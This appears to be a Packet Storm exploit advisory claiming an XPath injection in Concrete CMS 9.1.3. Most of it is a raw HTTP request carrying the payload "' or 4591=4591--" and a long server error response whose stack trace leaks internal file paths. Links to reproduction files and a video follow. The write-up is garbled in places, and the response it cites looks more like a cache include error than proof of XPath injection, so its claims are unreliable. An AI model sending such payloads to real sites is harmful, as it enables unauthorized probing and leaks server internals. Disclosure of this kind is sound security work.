Lucene search

K
packetstormNu11secur1tyPACKETSTORM:170041
HistoryNov 29, 2022 - 12:00 a.m.

Concrete CMS 9.1.3 XPATH Injection

2022-11-2900:00:00
nu11secur1ty
packetstormsecurity.com
420
concrete cms 9.1.3
xpath injection
vulnerability
exploit
attacker
requests
content paths
`## Title: concretecms-9.1.3 Xpath injection  
## Author: nu11secur1ty  
## Date: 11.28.2022  
## Vendor: https://www.concretecms.org/  
## Software: https://www.concretecms.org/download  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3  
  
## Description:  
The URL path folder `3` appears to be vulnerable to XPath injection attacks.  
The test payload 50539478' or 4591=4591-- was submitted in the URL  
path folder `3`, and an XPath error message was returned.  
The attacker can flood with requests the system by using this  
vulnerability to untilted he receives the actual paths of the all  
content of this system which content is stored on some internal or  
external server.  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploits:  
00:  
```GET  
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js  
HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 0  
```  
  
[+] Response:  
  
```HTTP  
HTTP/1.1 500 Internal Server Error  
Date: Mon, 28 Nov 2022 15:32:22 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Connection: close  
Content-Type: text/html;charset=UTF-8  
Content-Length: 592153  
  
<!DOCTYPE html><!--  
  
  
Whoops\Exception\ErrorException: include(): Failed opening  
'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php'  
for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')  
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php  
on line 26  
Stack trace:  
1. Whoops\Exception\ErrorException->()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
3. Stash\Driver\FileSystem\NativeEncoder->deserialize()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201  
4. Stash\Driver\FileSystem->getData()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631  
5. Stash\Item->getRecord()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321  
6. Stash\Item->executeGet()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252  
7. Stash\Item->get()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346  
8. Stash\Item->isMiss()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67  
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356  
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601  
11. Laminas\I18n\Translator\Translator->loadMessages()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434  
12. Laminas\I18n\Translator\Translator->getTranslatedMessage()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349  
13. Laminas\I18n\Translator\Translator->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69  
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27  
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47  
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267  
17. Concrete\Core\Block\View\BlockView->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
18. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853  
19. Concrete\Core\Area\Area->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128  
20. Concrete\Core\Area\GlobalArea->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11  
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125  
22. Concrete\Core\View\View->inc()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4  
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329  
24. Concrete\Core\View\View->renderTemplate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291  
25. Concrete\Core\View\View->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
26. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19  
27. Concrete\Controller\SinglePage\PageNotFound->view()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
28. call_user_func_array()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
29. Concrete\Core\Controller\AbstractController->runAction()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188  
30. Concrete\Core\Http\ResponseFactory->controller()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95  
31. Concrete\Core\Http\ResponseFactory->notFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390  
32. Concrete\Core\Http\ResponseFactory->collectionNotFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234  
33. Concrete\Core\Http\ResponseFactory->collection()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132  
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60  
35. Concrete\Core\Http\DefaultDispatcher->dispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39  
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39  
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36  
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36  
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35  
43. Concrete\Core\Http\Middleware\CookieMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29  
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86  
47. Concrete\Core\Http\Middleware\MiddlewareStack->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85  
48. Concrete\Core\Http\DefaultServer->handleRequest()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125  
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102  
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45  
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2  
  
  
--><html>  
<head>  
<meta charset="utf-8">  
<meta name="robots" content="noindex,nofollow"/>  
<meta name="viewport" content="width=device-width,  
initial-scale=1, shrink-to-fit=no"/>  
<title>Concrete CMS has encountered an issue.</title>  
  
<style>body {  
font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  
color: #131313;  
background: #eeeeee;  
padding:0;  
margin: 0;  
max-height: 100%;  
  
text-rendering: optimizeLegibility;  
}  
a {  
text-decoration: none;  
}  
  
.Whoops.container {  
position: relative;  
z-index: 9999999999;  
}  
  
.panel {  
overflow-y: scroll;  
height: 100%;  
position: fixed;  
margin: 0;  
left: 0;  
top: 0;  
}  
  
.branding {  
position: absolute;  
top: 10px;  
right: 20px;  
color: #777777;  
font-size: 10px;  
z-index: 100;  
}  
.branding a {  
color: #e95353;  
}  
  
header {  
color: white;  
box-sizing: border-box;  
background-color: #2a2a2a;  
padding: 35px 40px;  
max-height: 180px;  
overflow: hidden;  
transition: 0.5s;  
}  
  
header.header-expand {  
max-height: 1000px;  
}  
  
.exc-title {  
margin: 0;  
color: #bebebe;  
font-size: 14px;  
}  
.exc-title-primary, .exc-title-secondary {  
color: #e95353;  
}  
  
.exc-message {  
font-size: 20px;  
word-wrap: break-word;  
margin: 4px 0 0 0;  
color: white;  
}  
.exc-message span {  
display: block;  
}  
.exc-message-empty-notice {  
color: #a29d9d;  
font-weight: 300;  
}  
  
.......  
  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)  
  
## Proof and Exploit:  
[href](https://streamable.com/4f60ka)  
  
## Time spent  
`03:00:00`  
  
  
`